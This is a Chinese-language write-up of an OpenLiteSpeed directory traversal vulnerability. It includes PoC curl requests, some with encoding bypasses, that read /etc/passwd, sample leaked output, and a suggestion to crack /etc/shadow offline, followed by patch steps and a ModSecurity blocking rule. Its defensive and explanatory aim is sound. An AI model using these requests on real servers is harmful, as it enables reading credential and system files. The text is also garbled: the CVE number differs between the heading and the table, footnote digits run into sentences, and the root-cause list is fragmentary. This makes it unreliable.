CVE-2022-00721 是 LiteSpeed Web Server(OpenLiteSpeed)中的一个目录穿越漏洞。该漏洞允许未经认证的攻击者通过特制的 HTTP 请求来遍历 Web 服务器的目录结构,访问 Web 根目录之外的任意文件。
LiteSpeed Technologies 于 2022 年 11 月 14 日发布了安全公告2,同时披露了三个相关漏洞:
| CVE编号 | 漏洞类型 | 严重性 | 影响版本 |
|---|---|---|---|
| CVE-2022-0072 | 目录穿越 | High (7.5) | OpenLiteSpeed < 1.7.16.1 |
| CVE-2022-0073 | NULL 字节注入 | High (7.5) | OpenLiteSpeed < 1.7.16.1 |
| CVE-2022-0074 | 绕过访问控制 | Medium (5.3) | OpenLiteSpeed < 1.7.16.1 |
OpenLiteSpeed 是 LiteSpeed Web Server 的开源版本,广泛应用于 PHP 网站托管。漏洞存在于请求 URL 的解析逻辑中,当服务器处理包含特定路径遍历字符的请求时,未能正确规范化 URL 路径。
根据安全公告2,攻击者可利用该漏洞读取以下敏感信息:
/etc/passwd — 系统用户信息/etc/shadow — 用户密码哈希(需 root 权限可读)/etc/hosts — 主机名解析从 GitHub 仓库获取 OpenLiteSpeed < 1.7.16.1 版本进行测试:
利用目录穿越构造特殊请求路径:
# 基本目录穿越 PoC
curl -k https://target:443/../../../etc/passwd
# 利用编码绕过
curl -k "https://target:443/%2e%2e/%2e%2e/etc/passwd"
# 组合利用
curl -k "https://target:443/index.php/../../../../../etc/passwd"
如果漏洞存在,服务器会返回目标文件内容:
HTTP/1.1 200 OK
Content-Type: text/html
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
/etc/shadow 或应用密钥文件,进行离线破解Github commit 记录所示3:

RewriteRule4
"RewriteCond %{REQUEST_URI} !^/(index|login)\\.php$\n"
"RewriteCond %{REQUEST_URI} !^/view/(serviceMgr|confMgr|ajax_data|dashboard|logviewer|compilePHP|realtimestats)\\.php$\n"
"RewriteRule \\.php - [F]\n";
漏洞的根本原因在于:
.. 序列和编码后的路径分隔符.php 文件进行了过滤,但未对路径遍历序列进行有效拦截# Debian/Ubuntu
sudo apt update && sudo apt upgrade openlitespeed
# ModSecurity 规则示例
SecRule REQUEST_URI "(\.\.\/|\.\.\\|%2e%2e)" "id:100001,phase:1,deny,status:403,msg:'Directory traversal attempt'"
最小权限 — 确保 OpenLiteSpeed 进程以低权限用户运行,限制文件读取范围